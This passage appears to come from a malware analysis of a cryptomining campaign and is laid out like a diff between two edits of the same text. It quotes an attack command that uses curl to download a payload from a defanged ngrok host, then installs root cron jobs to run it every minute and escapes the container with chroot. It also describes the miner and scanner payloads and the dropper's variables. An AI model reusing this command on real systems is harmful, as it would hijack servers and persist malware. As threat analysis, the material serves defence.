 Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,

 There are two payload options.
-The first is a compiled Linux ELF miner (identified as Coinminer.SH.MALXMR.ATNO) that connects to the mining pool.
-The second is a script (TrojanSpy.SH.ZNETMAP.A) designed to obtain certain network tools used to scan network ranges and then search for new targets.
+The first is a compiled miner in ELF format for Linux (identified as Coinminer.SH.MALXMR.ATNO), which connects to the mining pool.
+The second is a script (TrojanSpy.SH.ZNETMAP.A), designed to obtain certain network tools used to scan network ranges and then search for new targets.

 The dropper script sets two variables, which are then used to deploy the cryptocurrency miner.
 The HOST variable contains the URL where the malicious files are located, and the RIP variable is the file name (in fact, the hash) of the miner to be deployed.
 The HOST variable changes every time the hash variable changes.
 The script also tries to check that no other cryptocurrency miners are running on the attacked server.